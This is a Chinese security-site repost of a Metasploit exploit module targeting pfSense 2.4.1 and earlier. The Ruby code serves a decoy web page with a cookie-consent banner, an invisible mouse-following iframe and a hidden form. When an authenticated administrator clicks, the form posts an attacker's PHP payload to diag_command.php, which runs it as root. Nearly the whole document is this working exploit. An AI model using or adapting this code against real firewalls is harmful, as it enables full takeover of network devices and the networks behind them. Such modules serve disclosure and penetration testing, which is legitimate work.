首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
pfSense 2.4.1 CSRF Error Page Clickjacking
来源:metasploit.com 作者:Koster 发布时间:2017-12-14  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'Clickjacking Vulnerability In CSRF Error Page pfSense',
        'Description'     => %q{
          This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

          pfSense is a free and open source firewall and router. It was found that the
          pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin
          into interacting with a specially crafted webpage it is possible for an attacker
          to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,
          this will result in a full compromise of the pfSense instance.
        },
        'Author'          => 'Yorick Koster',
        'Payload'         => { 'BadChars' => '"' },
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            ['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],
            ['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']
          ],
        'DefaultOptions'  =>
          {
            'EXITFUNC'    => 'process'
          },
        'Arch'            => ARCH_PHP,
        'Platform'        => 'php',
        'Targets'         =>
          [
            [ 'pfSense <= 2.4.1', { 'auto' => false } ]
          ],
        'DefaultTarget'   => 0,
        'DisclosureDate'  => 'Nov 21 2017'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])
      ]
    )
  end

  def js_file
    @js ||= lambda {
      path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')
      return File.read(path)
    }.call
  end

  def css_file
    @css ||= lambda {
      path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')
      return File.read(path)
    }.call
  end

  def background_file
    @background ||= lambda {
      path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg')
      return File.read(path)
    }.call
  end

  def on_request_uri(cli, request)
    print_status("GET #{request.uri} #{request.headers['User-Agent']}")

    resp = create_response(200, "OK")
    if request.uri =~ /\.js$/
      resp.body = js_file
      resp['Content-Type'] = 'text/javascript'

    elsif request.uri =~ /\.css$/
      resp.body = css_file
      resp['Content-Type'] = 'text/css'

    elsif request.uri =~ /\.jpg$/
      resp.body = background_file
      resp['Content-Type'] = 'image/jpg'

    else
      if datastore['TARGETURI'].end_with? '/'
        url = datastore['TARGETURI'] + 'diag_command.php'
      else
        url = datastore['TARGETURI'] + '/diag_command.php'
      end
      framename = rand_text_alpha(16)
      divname = rand_text_alpha(16)
      resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="#{get_resource.chomp('/')}/cookieconsent.min.css" />
<script src="#{get_resource.chomp('/')}/cookieconsent.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
        "palette": {
                "popup": {
                        "background": "#000",
                        "text": "#0f0"
                },
                "button": {
                        "background": "#0f0"
                }
        },
        "position": "top",
        "static": true
        });
});
</script>
<script>
document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
window.addEventListener('load', function(){
        document.forms[0].post.click();
        document.onmousemove = function(e) {
                var e = e \|\| window.event;
                var s = document.getElementById('#{divname}');
                s.style.left  = (e.clientX - 10) + 'px';
                s.style.top = (e.clientY - 5) + 'px';
        };
});
</script>
<body style="background-image:url(#{get_resource.chomp('/')}/background.jpg);background-size:cover;">
<div id="#{divname}" style="position:absolute;z-index:10;border:none;width:20px;height:10px;overflow:hidden;opacity:0.0;">
<iframe src="about:blank" name="#{framename}" sandbox="allow-forms" border="no" scrolling="no" width="800" height="800" style="width:400px;height:800px;margin-top:-70px;margin-left:-40px;"></iframe>
</div>
<div style="display:none">
<form action="#{url}" method="POST" enctype="multipart/form-data" target="#{framename}">
        <input type="hidden" name="txtPHPCommand" value="#{payload.encoded}" />
        <input type="hidden" name="submit" value="EXECPHP" />
        <input type="submit" name="post"/>
</form>
</div>
</body>
</html>
|
      resp['Content-Type'] = 'text/html'
    end

    cli.send_response(resp)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·glibc ld.so - Memory Leak / Bu
·Advantech WebAccess 8.2 Stack
·macOS/iOS - Kernel Double Free
·Dup Scout Enterprise 10.0.18 B
·macOS - Kernel Code Execution
·Microsoft Office DDE Payload D
·macOS/iOS - Multiple Kernel Us
·Western Digital MyCloud multi_
·macOS getrusage Stack Leak
·ITGuard-Manager 0.0.0.1 - Remo
·macOS necp_get_socket_attribut
·Sync Breeze 10.2.12 - Denial o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved